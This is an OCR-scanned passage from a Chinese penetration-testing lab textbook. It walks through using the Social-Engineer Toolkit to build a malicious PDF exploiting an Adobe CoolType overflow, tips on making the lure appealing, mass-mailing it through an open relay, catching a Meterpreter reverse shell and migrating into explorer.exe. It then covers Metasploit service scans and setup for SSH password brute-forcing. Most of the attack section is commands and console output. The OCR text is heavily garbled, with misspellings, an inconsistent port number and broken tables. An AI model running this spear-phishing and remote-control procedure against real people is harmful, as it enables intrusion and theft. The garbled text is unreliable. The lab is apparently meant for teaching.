(D 在 Back Track 5 中 打开 工具 集 。 
(D 打开 /pentest/exploits 文件 夹 。 


将 


root@bt:~ # od /pentest/exploits/ 

@ 使 用 1s 命令 查看 文件 夹 中 的 文件 信息 。 
root@bt:/pentest/exploits# ls - a 

设置 后 的 exploits 文件 夹 下 的 文件 信息 如 下 : 


total 28 

drwxr-xr-x 4 root root 4096 2011- 07- 12 06:59 exploitdo 

drwxr- xr- x 7 root root 4096 2011- 08- 16 13:33 fasttrack 

lrwxrwxarwk | | root root 19 2011- 08- 18 12:25 framework - > /apt/£ramework/msf3 
drwxr- xc x 14 root root 4096 2011- 05- 10 03:41 framework? 

drwxr-xr-x 9501 staff 4096 2011-06-07 14:17 isr- evilgrade 

drwxr-xr-x 10 root root 4096 2011- 05- 10 03:42 sapyto 

drwxr-xr-x 8 root root 4096 2011- 08- 16 18:56 set 

drwxr-xr-x 2 root root 4096 2011- 05- 10 03:42 spamhole 


@ 从 上 面 的 详细 文件 信息 看 到 了 SET 文件 夹 ,进入 此 文件 夹 。 
root@bt: /pentest /exploits# od set/ 

QD 使 用 . /set 命令 打开 SET 工具 集 。 

root@bt: /pentest/exploits/set ./set 


设置 后 的 SET 工具 集 打开 后 的 信息 如 下 : 


[---] Te Social- Engineer Toolkit (SET) [---1 
[---] Created by: David Kennedy (ReLIK) [==] 
[---]  Develqgment Team: Thames Werth ---1 
[---] Development Team: JR DePre (prime) E--1 
[---]  DBevelament Team: Joey Furr (jOfer) p-- 
[---] Versia: 2.0.3 E==] 
[---] Codename: "Trebuchet Edition" E:-- 
[---] Report bugs to: davekf searaniac.oam E-I 
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[---]  Followme on Twitter: dave rellk Epe-1 
[---] Homepage: http://Aww.seananiac.can 人 ==3 


Welcare to the Social- Engineer Toolkit (SET). Your one 
stop shop for all of your social- engineering needs.. 
DerbyCon 2011 Sep30- Oct02 - http: //www.derbycon.cam. 
Join us on inc. freenode.net in channel # setoolkit 
Select from the menu: 

1) Spear- Phishing Attack Vectors 

2) Website Attack Vectors 

3) Infectious Media Generator 

4) Create a Payload and Listener 

5) Mass Mailer Attack 

6) Arduino- Based Attack Vector 

7) SMS Spoofing Attack Vector 

8) Wireless Access Point Attack Vector 

9) Third Party Modules 

10) Update the Metasploit Framework 

11) Update the Social- Engineer Toolkit 

12) Help, Credits, and About 


" Exit the Social- Engineer Toolkit 
(2) 输入 1, 选择 Spear-Phishing Attack Vectors 选项 , 即 针 对 性 钓鱼 邮件 攻击 向 量 。 
SET 工具 集会 进一步 给 出 Spearphishing 攻击 方法 的 选项 。 


set>1 
设置 后 的 Spearphishing 攻击 方法 的 选项 如 下 : 


The Spearphishing module allows you to specially craft email messages and send 
them to a large (or small) nner of people with attached filefommat malicious 
payloads. If you want to spoof your email address, be sure "Sendmail" is in- 
stalled (it is installed in BT4) and change the config/set config SENDMAIL- OFF 
flag to SENIMATI= CN. 


There are two options, one is getting your feet wet and letting SET do 
everything for you (option 1), the seocnd is to create your own FileForrat 
payload and use it in your own attack. Either way, good luck and enjoy! 


1) Perform a Mass Email Attack 
2) Create a FileFormat Payload 
3) Create a Social- Engineering Template 


99) Return to Main Menu 


(3) 再 次 输入 1, 选 择 Perform a Mass Email Attack 选项 ,进行 一 次 群发 钓鱼 邮件 攻 
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击 , 然 后 进入 关键 选项 , 即 选 择 攻 击 载荷 。 
set:phishing> 1 
设置 后 的 攻击 载荷 选项 如 下 : 


Select the file format exploit you want. 
The default is the PDF erbedded BE. 


关 关 关 关 关 关 关 关 关 关 PAYTORDG 关 关 关 关 关 关 关 关 关 关 


1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 

2) SET Custcm Written Document UNC IM SMB Capture Attack 

3) Microsoft Windows CreateSizedDIRSECTION Stack Buffer Overflow 
4) Microsoft Word RIF pFragrents Stack Buffer Overflow (MS10- 087) 
5) Adcbe Flash Player "Button" Remote Code Execution 

6) Adobe CoolType SING Table "uniqueName" Overflow 

7) Adcbe Flash Player "newfunction" Invalid Pointer Use 

8) Adcbe Collab.collectEmailInfo Buffer Overflow 

9) Adobe Collab.getIoon Buffer Overflow 

10) Adcbe JBIG?Decode Memory Corruption Exploit 

11) Adobe PDF Enbectied EXE Social Engineering 

12) Adcbe util.printf() Buffer Overflow 

13) Custom EXE to VBA (sent via RAR) (RAR required) 

14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 

15) Adde PDF Erbbedded EXE Social Engineering (NOUS) 

16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 

17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 


(A) 输入 6, 选择 Adobe CoolType SING Table “uniqueName” Overflow 选项 ,该 模块 


针对 的 是 Adobe9. 3.4 之 前 的 阅读 器 版 本 ,漏洞 利用 原理 是 一 个 名 为 SING 的 表 对 象 中 名 
为 uniqueName 的 参数 造成 栈 缓存 区 溢出 。 


set :payloads> 6 
设置 后 的 攻击 载荷 的 类 型 如 下 : 
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 
2) Windows Meterpreter Reverse TCP Spawn a meterpreter shell cn victim and send 
back to attacker 
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back 
to attacker 
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, ReverseICP 
Inline 
5) Windows Meterpreter Reverse TCP (X64) Connect back to the attacker (Windows x64), 
Meterpreter 
6) Windows Shell Bind TCP (X64) Execute payload and create an acoepting port on remote system 


7) Windows Meterpreter Reverse HITPS Tunnel oamunication over HTTP using SSL and use Meterpreter 
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(5) 输入 2. 选择 Windows Meterpreter Reverse TCP 选项 . 靶 机 就 会 生成 一 个 
Meterpreter 会 话 ,并 回 连 到 攻击 机 。 


Set:payloads» 2 
设置 后 的 攻击 机 开启 了 433 端口 如 下 : 


Set:payloads» Port to connect back on [443]: 
[- ] Defaulting to port 443... 

[- ] Generating fileformat exploit... 

[* ] Payload creation complete. 


[* ] All payloads get sent to the src/progrem jurk/src/program junk/tenplate.pdf directory 
[- ] As an added bonus, use the file- format creator in SET to create your attachment. 


Right now the attachment will be imported with filename of 'template.whatever' 
Do you want to rename the file? 
example Enter the new filename: moo.pdf 

1. Keep the filename, I don't care. 


2. Rename the file, I want to be cool. 


可 以 看 到 ,输入 2 以 后 ,会 在 攻击 机 的 443 端口 开启 一 个 监听 窗口 ,当然 ,端口 号 也 可 以 
自己 进行 指定 。 并 且 在 目录 src/program_junk/src/program_junk/ 下 生成 了 攻击 载荷 文件 
template. pdf 。 提 供 修改 文件 名 的 选项 是 因为 方便 将 攻击 载荷 的 文件 名 修改 为 让 目标 更 加 
容易 去 选择 的 文件 名 ,以 达到 攻击 的 目的 。 

(6) 所 以 在 这 里 选择 选项 2 。 

set :phishing> 2 
并 在 提示 符 后 输入 自己 想 要 的 文件 名 (注意 ,是 包括 后 级 名 在 内 的 文件 名 )。 

设置 后 的 界面 显示 如 下 : 

set:phishing» New filename: your wanted.pdf 

(7) fE Ener 键 后 便 更 改 了 攻击 文件 的 名 称 。 

设置 的 新 的 文件 名 如 下 : 


[* ] Filename changed, moving on... 
Social Engineer Toolkit Mass E- Mailer 
There are two options on the mass e mailer, the first would 
will allow you to import a list and send it to as many people as 


you want within that list. 
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What do you want to do: 


1. E-Mail Attack Single Email Address 
2. E- Mail Attack Mass Mailer 
99. Retum to main menu. 


(8) 确认 文件 是 否 生 成 ,以 及 生成 的 文件 内 容 。 
CD 输入 刚才 提示 的 文件 路 径 。 


roottbt:~ # ad /pentest/exploits/set/src/program junk/ 
@ 使 用 1s 命令 查看 文件 是 否 存在 。 

root@bt: /pentest/esploits/set/src/program junk 1s - 1 
设置 后 生成 的 攻击 文件 如 下 : 


total 100 

二 48 2016- 06- 01 21:23 payload.gptions 
-rw-r--r--1root root 46867 2016- 06- 0l 21:23 template.pdf 

- rw- r- -r-- 1 root root 46867 2016- 06- 01 23:01 your wanted.pdf 


@ 使 用 xpdf 命令 查看 生成 的 攻击 文件 内 容 。 
root@bt: /pentest /exploits/set/src/program_junk# xpdf your wanted.pdf 
攻击 文件 的 内 容 如 图 13. 2. 1 所 示 。 


Xpdf: your_wanted.pdf 


Hello World! 





图 1321 攻击 文件 的 内 容 


@ 可 以 看 出 文本 内 容 过 于 简单 ,目标 打开 文件 后 可 能 会 因为 觉得 没有 实际 内 容 而 过 早 
地 关闭 文件 ,而 如 果 文 件 打开 的 时 间 长 短 直接 影响 着 攻击 的 成 败 。 因 此 建议 使 用 PDF 编辑 
器 对 文件 内 容 进行 充实 ,尽量 使 得 攻击 目标 有 很 大 的 兴趣 来 阅读 此 文件 ,而 不 是 过 早 地 关闭 
而 影响 攻击 效果 。 
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(9) 回 到 第 (7) 步 的 攻击 页 面 , 继 续 往 下 执行 。 输 入 1, 选 择 E-Mail Attack Single Email 
Address 选项 , 即 单独 针对 一 个 邮箱 地 址 进行 邮件 攻击 。 


set:phishing> 1 
设置 后 选择 邮件 模版 的 信息 如 下 : 


Do you want to use a predefined template or craft 
acne time email template. 


1. Pre- Defined Template 
2. One- Time Use Frrail Template 
(10) 下 面 就 是 要 完善 攻击 邮件 的 内 容 了 。 一 封 邮件 包括 的 东西 很 多 ,有 主题 .内容 和 
目标 地 址 等 。 下 面 , 输 入 2, 选择 One-Time Use Email Template 选项 , 即 单独 使 用 一 个 新 的 
邮件 模板 。 


set:phishing» 2 
输入 的 邮件 内 容 如 下 : 


set:phishing» Subject of the email: new file 
set:phishing» Send the message as html or plain? 'h' or 'p' [p]: p 


set :phishing> Enter the body of the message, hit retum for a new line. Control+ c when finished: 
Next line of the body: Hi Zhang san 

Next Line of the body: Do you want a new life? 

Next line of the body: Welcare to join us 

Next line of the body: Best wishes! 

Next line of the body: Wang qiang 


Next line of the body: ^Cset:phishing» Send email to: xx 8163.ccm. 
其 中 加 粗 字 体 的 内 容 为 自己 输入 的 内 容 , 应 该 根据 自己 的 要 求 和 实际 需要 输入 相关 内 容 。 
在 输入 完 邮 件 内 容 之 后 , 按 Ctrl 十 C 快捷 键 退 出 ,输入 目标 邮件 地 址 。 结 束 后 按 Enter 键 ， 
会 让 用 户 选择 邮件 服务 器 。 

选择 邮件 服务 器 列表 如 下 : 

1. Use a grail Account for your email attack. 

2. Use your own server or open relay 

(11) 选择 “2. Use your own server or open relay” 选 项 ,使 用 一 个 自己 的 邮件 服务 器 或 
者 开放 代理 服务 器 , 即 输入 如 下 相应 信息 : 





set:phishing> 2 
攻击 模块 邮件 服务 器 配置 结果 如 下 : 


set :phishing> Fram address (ex: moo@exanple.cam) : 关 关 关头 关 关 % 关 兴 关 @CHLCCI 
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set:phishing» Username for oper- relay [blank]: name 

Password for goen- relay [blank]: ***** 

set:phishing» MIP email server address (ex. smtp.youremailserveryouown.cam) : mail.qg.can 
set:phishing» Port nunber for the MP server [25]: 

set iphishing> Flag this message/s as high priority? [yes|no]: yes 

[* ] SET has finished delivering the emails 

set:phishing> Set up a listener [yes|no]: yes 

[- ] «ex 


[* ] Processing src/program junk/meta_config for FRB directives. 
(12) 切换 到 攻击 开启 模块 。 

resource (src/program junk/meta config)» use exploithmlti/handler 
(13) 设置 PAYLOAD 选项 ,选择 reverse tcp 模块 。 
resource (src/program junk/meta config)» set PAYLOAD windows/meterpreter/reverse tcp 
设置 后 的 界面 显示 如 下 : 

PAYLOAD= > windows/meterpreter/reverse tcp 

(14) 设置 LHOST 选项 , 选 为 本 机 IP 地 址 。 

resource (src/program junk/meta config)» set LHOST 10.10.10.128 

设置 后 的 界面 显示 如 下 : 

LHOST= > 10.10.10.128 

(15) 设置 LPORT 选项 , 选 为 433 端口 。 

resource (src/program junk/meta config)» set LECRT 443 

设置 后 的 界面 显示 如 下 : 

LPFORI= > 443 

(16) 设置 ENCODING 选项 , 选 为 shikata_ga_nai。 
resource (src/program junk/meta config)» set ENCODING shikata ga nai 
设置 后 的 界面 显示 如 下 : 

ENOODING= > shikata ga nai 

(17) 设置 ExitOnSession 选项 , 选 为 false, 即 不 主动 退出 。 
resource (src/program junk/meta_config)> set Exitonsessicn false 
设置 演示 如 下 : 

ExitOnSessior- > false 


(18) 下 面 就 可 以 使 用 exploit 命令 进行 攻击 了 : 
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resource (src/program junk/meta_config)> exploit -j 
设置 结束 后 开始 攻击 的 信息 如 下 : 


[* ] Exploit nming as background jab. 

mef exploit (handler)» 

[* ] Started reverse handler on 10.10.10.128:433 
[* ] Starting the payload handler ... 


至 此 ,攻击 PDF 文件 已 经 随 着 邮件 发 送 到 目标 邮箱 中 ,现在 就 是 在 等 待 目 标 邮 箱 中 的 
PDF 文件 被 邮箱 主人 打开 。 

当 对 方 打开 PDF 文件 的 时 候 , 攻 击 机 控制 端 就 会 收 到 回 连 的 Meterpreter 控制 会 话 , 如 
下 所 示 : 


[* ] Sending stage (100215 bytes) to 10.10.10.140 
[* ] Meterpreter session i opened (10.10.10.128:433- > 10.10.10.140:1063) at 2016- 06- 02 08:00:15- 0400 


(19) 下 面 对 上 述 这 个 回 连 的 控制 会 话 进行 交互 。 
(D msf exploit Chandler) sessions 


设置 后 与 控制 会 话 进行 交互 的 信息 如 下 : 


Id Type Information Connection 


1 meterpreter x86/win32 DH- CA8822AB9599\ Administrator @DH- CA8822AB9589 10.10.10.128:433- > 10.10.10.140:1063 
@ 选择 ID 为 1 的 控制 会 话 端口 。 

mef exploit handler)> sessions - i 1 

设置 后 与 控制 会 话 端口 进行 交互 的 显示 信息 如 下 : 

[* ] Starting interfation with 1... 


(20) 可 以 看 出 ,此 时 已 经 进入 Meterpreter. F ifii 9] ii Meterpreter 控制 主机 的 进程 


Process list 

PID Neme Arch Session User Path 

0 [System Process] 

1036 svchost.exe x86 0 NT AUTHORITYNSYSIEM C:NWINDOWSNSysteni32 svchost.exe 


2980 AcroRd32.exe x86 0 DH CA8822AB9589\Administrator C:\Program Files\ 
Adkbe\Reader 9.0\Reader\AcroRd32.exe 

320 explorer.exe x86 0 DH CA8822AB9589 Administrator C: NWINDOWEN 
Explorer.EXE 


(21) 可 以 看 到 PID X 2980 的 AcroRd32. exe 进程 和 下 面 PID 为 320 的 explorer. exe 
进程 。 此 时 输入 下 面 的 命令 ,将 攻击 载荷 迁移 到 explorer. exe 进程 上 。 


meterpreter> migrate 320 
设置 后 将 攻击 载荷 迁移 到 explorer. exe 进程 显示 如 下 所 示 : 


[* ] Migrating to 320.. 
[* ] Migrating completed successfully. 


可 以 看 出 ,Meterpreter 攻击 载荷 已 经 迁移 到 explorer. exe 进程 上 了 。 
实验 报告 要 求 

+ 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 


。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 14 童 ”网络 服务 扫描 实验 


14.1 常用 扫描 服务 模块 


很 多 网 络 服务 是 漏洞 频 发 的 高 危 对 象 , 对 网 络 上 的 特定 服务 进行 扫描 ,往往 能 少 走 弯 
路 ,增加 渗透 成 功 的 几率 。 确 定 开放 端口 后 ,通常 需要 对 相应 端口 上 所 运行 服务 的 信息 进行 
更 深入 的 挖掘 ,这 一 过 程 称 为 服务 查 点 。 

在 Metasploit 的 Scanner 辅助 模块 中 ,有 很 多 用 于 服务 扫描 和 查 点 的 工具 ,这 些 工 具 通 
常 以 [service_name |_version 和 [service_name ] login 命名 。 

[ service, name ]. version 可 用 于 遍历 网 络 中 包含 了 某 种 服务 的 主机 ,并 进一步 确定 服务 
IR. [service name] login 可 对 某 种 服务 进行 口令 探测 攻击 。 

例如 ,http_version 可 用 于 查找 网 络 中 的 Web 服务 器 ,并 确定 服务 器 的 版 本 号 ,http __ 
login 可 用 于 对 需要 身份 认证 的 HTTP 协议 应 用 进行 口令 探测 。 

在 Metasploit 中 并 非 所 有 的 模块 都 按照 这 种 命名 规范 进行 开发 ,例如 用 于 查找 
Microsoft SQL Server 服务 的 mssql_ping 模块 等 。 


14.1.1 Telnet 服务 扫描 


Telnet 协议 是 TCP/IP 协议 族 中 的 一 员 ,是 Internet 远程 登录 服务 的 标准 协议 和 主要 
方式 。 它 为 用 户 提供 了 在 本 地 计算 机 上 完成 远程 主机 工作 的 能 力 。 在 终端 使 用 者 的 计算 机 
上 使 用 Telnet 程序 ,用 它 连接 到 服务 器 。 终 端 使 用 者 可 以 在 Telnet 程序 中 输入 命令 ,这 些 
命令 会 在 服务 器 上 运行 ,就 像 直 接 在 服务 器 的 控制 台 上 输入 一 样 。 在 本 地 就 能 控制 服务 器 。 
要 开始 一 个 Telnet 会 话 ,必须 输入 用 户 名 和 密码 来 登录 服务 器 。Telnet 也 是 常用 的 远程 控 
制 Web 服务 器 的 方法 。 

由 于 Telnet 协议 没有 对 传输 的 数据 进行 加 密 , 越 来 越 多 的 管理 员 开始 使 用 更 为 安全 的 
SSH 协议 代替 它 。 但 是 ,很 多 旧版 的 网 络 设备 不 支持 SSH 协议 ,而 且 管理 员 通 常 不 愿 冒 风 
险 升 级 重要 设备 的 操作 系统 ,所 以 网 络 上 很 多 交换 机 、 路 由 器 甚至 防火 墙 仍 然 在 使 用 Telnet 
协议 。 一 个 有 趣 的 现象 是 ,价格 昂贵 .使 用 寿命 更 长 的 大 型 交换 机 使 用 Telnet 协议 的 可 能 
性 会 更 大 ,而 此 类 交换 机 在 网 络 中 的 位 置 一 般 都 非常 重要 。 当 渗透 进入 一 个 网 络 时 ,不 妨 扫 
描 一 下 是 否 有 主机 或 设备 开启 了 Telnet 服务 ,为 下 一 步 进 行 网 络 嗅 探 或 口令 猜测 做 好 
准备 。 


14.1.2 SSH 服务 扫描 


SSH 是 Secure Shell 的 缩写 ,由 IETF 的 网 络 工作 小 组 Cnetwork working group) Hr til 

定 ;SSH 为 建立 在 应 用 层 和 传输 层 基 础 上 的 安全 协议 。SSH 是 目前 较 可 靠 、 专 为 远程 登录 

会 话 和 其 他 网 络 服务 提供 安全 性 的 协议 。 利 用 SSH 协议 可 以 有 效 地 防止 远程 管理 过 程 中 

的 信息 泄露 问题 。SSH 最 初 是 UNIX 系统 上 的 一 个 程序 ,后 来 又 迅速 扩展 到 其 他 操作 平 
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G. SSH 在 正确 使 用 时 可 弥补 网 络 中 的 漏洞 。SSH 客户 端 适 用 于 多 种 平台 。 几 乎 所 有 
UNIX 平台 ,包括 HP-UX, Linux, AIX „Solaris Digital UNIX Irix 等 ,都 可 运行 SSH, 

SSH 是 类 UNIX 系统 上 最 常见 的 远程 管理 服务 ,与 Telnet 不 同 的 是 , 它 采 用 了 安全 的 
加 密 信 息 传 输 方 式 。 通 常 管 理 员 会 使 用 SSH 对 服务 器 进行 远程 管理 ,服务 器 会 向 SSH 客 
户 端 返回 一 个 远程 的 Shell 连接 。 如 果 没 有 做 其 他 的 安全 增强 配置 (如 限制 管理 登录 的 IP 
地 址 ) ,只 要 获取 服务 器 的 登录 口令 就 可 以 使 用 SSH. 客户 端 登录 服务 器 ,相当 于 获得 了 相应 
登录 用 户 的 所 有 权限 。 


14.1.3 SSH 口令 猜测 


在 前 面 的 实验 中 使 用 Metasploit 中 的 ssh_version 模块 扫描 到 目标 网 站 范围 内 开放 的 
SSH 服务 的 主机 ,那么 接 下 来 就 尝试 使 用 Metasploit 中 的 ssh_login 模块 对 SSH 服务 进行 
口令 试探 攻击 。 

进行 口令 攻击 之 前 ,需要 一 个 好 用 的 用 户 名 和 口令 字典 。 这 个 从 网 上 都 能 找到 很 多 ,不 
过 在 使 用 之 前 ,需要 注意 Windows 和 Linux 系统 下 文件 编码 的 区 别 , 和 否则 会 导致 加 载 口令 
字典 出 错 。 

在 载 人 ssh. login 模块 后 ,首先 需要 设置 RHOSTS 参数 指定 口令 攻击 的 对 象 , 可 以 是 
一 个 IP 地 址 或 一 段 IP 地 址 , 同样 也 可 以 使 用 CIDR 表示 的 地 址 区 段 。 然 后 使 用 
USERNAME 参数 指定 一 个 用 户 名 (或 者 使 用 USER_FILE 参数 指定 一 个 包含 多 个 用 户 名 
的 文本 文件 ,每 个 用 户 名 占 一 行 ), 并 使 用 PASSWORD 指定 一 个 特定 的 口令 字符 串 ( 或 者 
使 用 PASS. FILE 参数 指定 一 个 包含 多 个 口令 的 字典 文件 ,每 个 口令 占 一 行 ), 也 可 以 使 用 
USERPASS FILE 指定 一 个 用 户 名 和 口令 的 配对 文件 (用 户 名 和 口令 之 间 用 空格 隔 开 ,每 
对 用 户 名 和 口令 占 一 行 )。 默 认 情 况 下 ,ssh_login 模块 还 会 尝试 空 口令 以 及 与 用 户 名 相同 
的 弱 口 令 进 行 登录 测试 。 


14.1.4 数据 库 服务 查 点 


1. Microsoft SQL Server 数据 库 

SQL Server 是 一 个 关系 数据 库 管 理 系统 , 它 最 初 是 由 Microsoft, Sybase 和 Ashton- 
Tate 3 家 公司 共同 开发 的 ,于 1988 年 推出 了 第 一 个 OS/2 版 本 。 在 Windows NT 推出 后 ， 
Microsoft 公司 与 Sybase 公司 在 SQL Server ff] F £ E 41 38 H E . Microsoft 公司 将 SQL 
Server 移植 到 Windows NT 系统 上 ,专注 于 开发 推广 SQL Server 的 Windows NT 版 本 。 
Sybase 公司 则 专注 于 SQL Server 在 UNIX 操作 系统 上 的 应 用 。 

SQL Server 是 关系 型 数据 库 管 理 系统 ,具有 使 用 方便 .可 伸缩 性 好 与 相关 软件 集成 程 
度 高 等 优点 ,可 跨越 从 运行 Microsoft Windows 98 的 膝 上 型 计算 机 到 运行 Microsoft 
Windows 2012 的 大 型 多 处 理 器 的 服务 器 等 多 种 平台 使 用 。 

Microsoft SQL Server 是 一 个 全 面 的 数据 库 平 台 , 使 用 集成 的 商业 智能 (BD 工具 提供 
了 企业 级 的 数据 管理 。Microsoft SQL Server 数据 库 引 擎 为 关系 型 数据 和 结构 化 数据 提供 
了 更 安全 可 靠 的 存储 功能 ,使 用 户 可 以 构建 和 管理 用 于 业务 的 多 用 途 和 高 性 能 的 数据 应 用 
程序 。 

各 种 网 络 数据 库 的 网 络 服务 端口 是 漏洞 频 发 的 重 灾 区 ,Microsoft SQL Server 的 1433 
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端口 即 为 其 中 一 个 。 可 以 使 用 Metasploit 中 mssql_ping 模块 查找 网 络 中 的 Microsoft SQL 
Server。 

2. Oracle 数据 库 

Oracle 数据 库 系统 是 美国 Oracle( 甲 骨 文 ) 公 司 提供 的 以 分 布 式 数据 库 为 核心 的 一 组 软 
件 产 品 , 是 目前 最 流行 的 客户 /服务 器 (Client/Server) 或 B/S 体系 结构 的 数据 库 之 一 。 例 
如 ,SilverStream 是 基于 数据 库 的 一 种 中 间 件 。Oracle 数据 库 是 目前 世界 上 使 用 最 为 广泛 
的 数据 库 管理 系统 ,作为 一 个 通用 的 数据 库 系 统 , 它 具有 完整 的 数据 管理 功能 ;作为 一 个 
关系 数据 库 , 它 是 一 个 完备 关系 的 产品 ;作为 分 布 式 数据 库 , 它 实现 了 分 布 式 处理 的 功 
能 。 但 它 的 所 有 知识 ,只 要 在 一 种 机 型 上 学 习 Oracle 知识 , 便 能 在 其 他 类 型 的 计算 机 上 
使 用 它 。 

可 以 使 用 tnslsnr_version 模块 ,查找 网 络 中 开放 端口 的 Oracle 监听 器 服务 。 


14.2 网 络 服务 扫描 基础 实验 


实验 器 材 


Metasploit 工具 ,1 f£, 
PC,1 4G. 


实验 任务 

扫描 当前 机 器 的 网 络 服务 。 

实验 环境 

一 台 安装 了 Metasploit 的 计算 机 。 

预备 知识 

(1) Telnet 服务 相关 知识 。 

(2) SSH 服务 相关 知识 。 

C30 数据 库 相 关 知 识 。 

实验 步 又 

1. Telnet version 模块 

CD 通过 use 命令 使 用 telnet. version 模块 。 
msf> use auxiliary/scanner/telnet/telnet version 
(2) 通过 show 命令 查看 模块 的 设置 选项 。 
nef auxiliary (telnet versicn)> show cptions 

通过 show 命令 查看 模块 设置 选项 如 下 : 


Module options (auxiliary/scanner/telnet/telnet_versicn) : 
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PASSWORD no The password for the specified usemare 
REORT 23 yes The target port 

THREADS 1 yes The nurber of concurrent threads 
TIMECUT 30 yes Timeout for the Telnet probe 

USERNAME no The username to authenticate as 


其 中 ,Name 表示 需要 设置 的 选项 的 名 称 ;Current 表示 该 选项 目前 默认 的 设置 值 ;Setting 
表示 是 否 进行 了 设置 ;Required 表示 该 选项 是 否 必须 设置 ;yes 表示 必须 进行 设置 ,而 no WU 
表示 可 以 设置 也 可 以 不 进行 设置 ;Description 表示 的 是 对 选项 的 介绍 。 

上 述 最 重要 的 选项 是 RHOSTS, 即 目标 地 址 范围 或 CIDR 标识 符 , 也 就 是 要 扫描 的 地 
址 范围 设置 。 

(3) 使 用 set 命令 设置 目标 地 址 范围 。 


msf auxiliary(telnet version)» set rhosts 10.10.10.0/24 
设置 后 显示 如 下 : 

rhosts- > 10.10.10.0/24 

(4) 使 用 set 命令 设置 并 发 线程 的 数量 。 

msf auxiliary(telnet version)» set threads 100 
设置 后 显示 如 下 : 

threads= > 100 

(5) 使 用 run 命令 来 执行 扫描 。 

msf auxiliary(telnet version)» run 

设置 扫描 范围 扫描 后 的 结果 如 下 : 


* ] Scanned 064 of 256 hosts (025% camplete) 
* ] Scanned 075 of 256 hosts (02% camplete) 
* ] Scanned 105 of 256 hosts (041% camplete) 
* ] Scanned 106 of 256 hosts (041% camplete) 
* ] Scanned 157 of 256 hosts (061% camplete) 
* ] Scanned 164 of 256 hosts (064% camplete) 
* ] Scanned 195 of 256 hosts (076% camplete) 
* ] Scanned 206 of 256 hosts (080% camplete) 
* ] 10.10.10.254:23 TELNET Ubuntu 8.04\x0ametasploitable login: 
* ] Scanned 252 of 256 hosts (096% camplete) 
* ] Scanned 256 of 256 hosts (100% camplete) 
* ] Auxiliary module execution completed 


可 以 看 出 ,IP 地 址 为 10. 10. 10. 254( 自 己 搭建 的 网 络 ) 的 主机 ( 即 网 关 服 务 器 ) 开 放 了 
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Telnet 服务 ,通过 返回 的 服务 旗 标 Ubuntu 8. 04\x0ametasploitable login, 可 以 进一步 确认 
出 这 人 台 主 机 的 操作 系统 版 本 为 Ubuntu 8. 04 ,而 主机 名 为 metasploitable。 

2. SSH_version 模块 

CD 通过 use 命令 使 用 ssh. version 模块 。 


msf> use auxiliary/scanner/ssh/ssh version 


(2) 通过 show 命令 查看 模块 的 设置 选项 。 
查看 结果 如 下 : 


Module options (auxiliary/scanner/ssh/ssh versicn): 


Name Current Setting Required Description 


RHOSTS yes ‘The target address range or CITR identifier 
RECRT 22 yes The target port 

THREADS x yes The munber of concurrent threads 
TIMECOUT 30 yes Timeout for the SSH probe 


Hj telnet. version 模块 相同 ,ssh_version 扫描 模块 的 设置 选项 也 包括 Name, Current, 
Setting, Required 和 Description 5 个 部 分 ,含义 也 相同 。 这 里 也 不 过 多 介绍 了 。 
(3) 使 用 set 命令 设置 目标 地 址 范围 。 


msf auxiliary(ssh_version)> set rhosts 10.10.10.0/24 
(4) 使 用 set 命令 设置 并 发 线程 的 数量 。 
msf auxiliary(ssh_version)> set threads 100 

(5) 使 用 run 命令 来 执行 扫描 。 

mef auxiliary (ssh_version)> run 

对 设置 扫描 范围 扫描 后 的 结果 如 下 : 


* ] Scanned 051 of 256 hosts (01% camplete) 

* ] Scanned 073 of 256 hosts (028% camplete) 

* ] Scanned 104 of 256 hosts (040% camplete) 

* ] 10.10.10.129:22, SSH server version: SSH- 2.0- OpenSSH 5.3pl Debian- 3dbuntud 
* ] Scanned 110 of 256 hosts (042% ocmplete) 

* ] Scanned 140 of 256 hosts (054% camplete) 

* ] Scanned 155 of 256 hosts (060% camplete) 

* ] 10.10.10.254:22, SSH server version: SSH- 2.0- QpenSSH_4.7pl Debian- Suuntul 
* ] Scanned 196 of 256 hosts (076% canplete) 

* ] Scanned 205 of 256 hosts (080% oamlete) 

* ] Scanned 242 of 256 hosts (094% omplete) 

* ] Scanned 256 of 256 hosts (100% camplete) 

* ] Auxiliary module execution carpleted 


可 以 看 出 ,使 用 Metasploit 中 的 ssh. version 辅助 模块 ,可 以 很 快 地 在 设置 的 网 络 范围 
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中 定位 了 两 台 开 放 SSH 服务 的 主机 ,分 别 是 10. 10. 10. 129( 网 站 服务 器 ) 和 10. 10. 10. 254 
(网 关 服 务 器 ) ,并 且 显示 了 SSH 服务 软件 及 具体 版 本 号 。 有 了 这 些 信 息 , 就 可 以 通过 查询 
等 方式 得 到 相应 版 本 号 的 一 些 基本 信息 及 漏洞 信息 ,为 之 后 进一步 操作 提供 了 可 能 。 


3. SSH login 模块 
CD 通过 use 命令 使 用 ssh. login 模块 。 


msf> use auxiliary/scanner/ssh/ssh_login 


(2) 通过 show 命令 查看 模块 的 设置 选项 。 


msf auxiliary(ssh login)» show options 


查看 结果 如 下 : 


Module options (auxiliary/scanner/ssh/ssh login): 


PASS FIE 


USERPASS FIIE 


tre no 
5 yes 
no 
no 
yes 
22 yes 
false yes 
1 yes 
no 
no 
tne no 
no 
tne yes 


Try blank passwords for all users 
How fast to bruteforoe, frm 0 to 5 
A specific password to authenticate 
with 

File omtaining passwords, cre per 
lire 

The target actress range or CIR 
The target port 

‘Stop guessing when a crecential 
works for a host 

The nnber of concent threads 

A specific usemare to 
authenticate as 
separated by space, one pair per line 
Ty the uena as the password for 
all users 

File ontaining usemares, cre per 
line 

Whether to print output for all 
attempts 


与 前 面相 比 ,ssh_login 模块 用 到 的 设置 项 多 了 很 多 ,下 面 进行 简单 的 介绍 : 

BLANK_PASSWORDS, 即 空白 密码 , 即 前 面 讲 到 的 会 先 默认 为 对 空白 密码 进行 验证 。 

BRUTEFORCE_SPEED, 即 暴力 破解 的 速度 ,从 0 到 5 可 选 。 

PASSWORD, 即 准备 暴力 破解 使 用 的 密码 ,虽然 不 是 必须 的 ,但 是 没有 进行 暴力 破解 
的 密码 ,模块 在 验证 完 空 密码 后 就 停止 了 ,因此 这 个 其 实 是 必须 设置 的 。 
